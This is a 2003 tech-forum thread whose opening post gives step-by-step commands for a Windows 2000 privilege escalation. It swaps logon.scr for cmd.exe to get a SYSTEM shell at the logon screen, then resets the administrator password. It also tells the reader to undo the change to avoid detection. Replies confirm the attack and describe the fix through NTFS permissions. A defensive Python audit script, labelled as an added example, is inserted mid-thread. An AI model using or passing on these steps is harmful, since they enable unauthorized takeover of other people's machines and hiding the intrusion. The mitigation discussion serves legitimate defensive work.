Solved

I have a new exploit for you all to figure a way round

Posted on 2003-02-20
Last Modified: 2013-12-04
This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.


If you can log in as an account, drop to DOS (Start -> Run -> cmd). At the C: prompt, type the following (assuming default install locations):

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine. logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just do
C:\> net user administrator <newpassword>
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.


 
Credits:

Author:Will W.

 
Question by:wirehead203
9 Comments
 
LVL 9

Expert Comment

by:MSGeek
ID: 7989242
To clarify, you are looking for a way around this exploit?  It does not even sound like you are sure it works?
0
 
LVL 1

Expert Comment

by:craigtin
ID: 7995330
I think you answer your own question.  If you allow full permission to the system folders for users, why do you care if they can rename a file?
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 8009998
By the way, this exploit does work.  
0

 
LVL 9

Expert Comment

by:MSGeek
ID: 8009999
By the way, this exploit does work.  
0
 
LVL 1

Accepted Solution

by:
craigtin earned 100 total points
ID: 8010072
Even if you restrict users' rights on the folders?
Then the command prompt must be using system privilege.
0
 
LVL 9

Assisted Solution

by:MSGeek
MSGeek earned 100 total points
ID: 8010251
If you change NTFS rights so they cannot del and copy (rename) the file, you're OK.  This will not work with default security settings for normal users in XP.  But it does in 2000 and 2000 Server.
0
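An added example, not part of the original thread or any poster's code: a defensive audit for the logon.scr swap described in the question, plus a check of the NTFS-rights fix from the answer above. It assumes the default C:\winnt\system32 layout from the post; the function names, the TRUSTED set and the cacls sample text are constructed for illustration.

```python
# Added example: audit for the logon.scr swap and for weak rights on the file.
import re
from pathlib import Path

# Assumption: only these principals should be able to modify the screen saver.
TRUSTED = {"BUILTIN\\Administrators", "NT AUTHORITY\\SYSTEM"}


def audit_logon_screensaver(system32):
    """Return a list of findings for a system32-style directory."""
    d = Path(system32)
    scr, cmd = d / "logon.scr", d / "cmd.exe"
    findings = []
    if not scr.exists():
        findings.append("logon.scr is missing")
    elif cmd.exists() and scr.read_bytes() == cmd.read_bytes():
        findings.append("logon.scr is byte-identical to cmd.exe")
    if (d / "logon.scr.old").exists():
        findings.append("leftover backup logon.scr.old present")
    return findings


def writable_by_untrusted(path, cacls_output):
    """Parse `cacls <path>` text; return untrusted principals holding W, C or F."""
    risky = []
    for line in cacls_output.splitlines():
        entry = line.replace(path, "", 1).strip()
        principal, sep, perm = entry.rpartition(":")
        perm = re.sub(r"\([A-Z]+\)", "", perm).strip()  # drop (OI)(CI)-style flags
        if sep and perm in {"W", "C", "F"} and principal not in TRUSTED:
            risky.append(principal)
    return risky


# Constructed sample output, not captured from a real machine.
SAMPLE_PATH = r"C:\winnt\system32\logon.scr"
SAMPLE_CACLS = (
    SAMPLE_PATH + " BUILTIN\\Users:R\n"
    + " " * 28 + "BUILTIN\\Power Users:C\n"
    + " " * 28 + "BUILTIN\\Administrators:F\n"
    + " " * 28 + "NT AUTHORITY\\SYSTEM:F\n"
)

if __name__ == "__main__":
    print(audit_logon_screensaver(r"C:\winnt\system32"))
    print(writable_by_untrusted(SAMPLE_PATH, SAMPLE_CACLS))
```

Deleting or replacing a file also depends on the rights granted on the containing folder, so run the same rights check against the system32 directory itself.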
 

Expert Comment

by:CleanupPing
ID: 9070888
wirehead203:
This old question needs to be finalized -- accept an answer, split points, or get a refund.  For information on your options, please click here-> http:/help/closing.jsp#1 
EXPERTS:
Post your closing recommendations!  No comment means you don't care.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 9073148
wirehead.. how'd you make out with this.  MSGeek.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 11349154
Thanks Modulo.  MSGeek
0


Question has a verified solution.
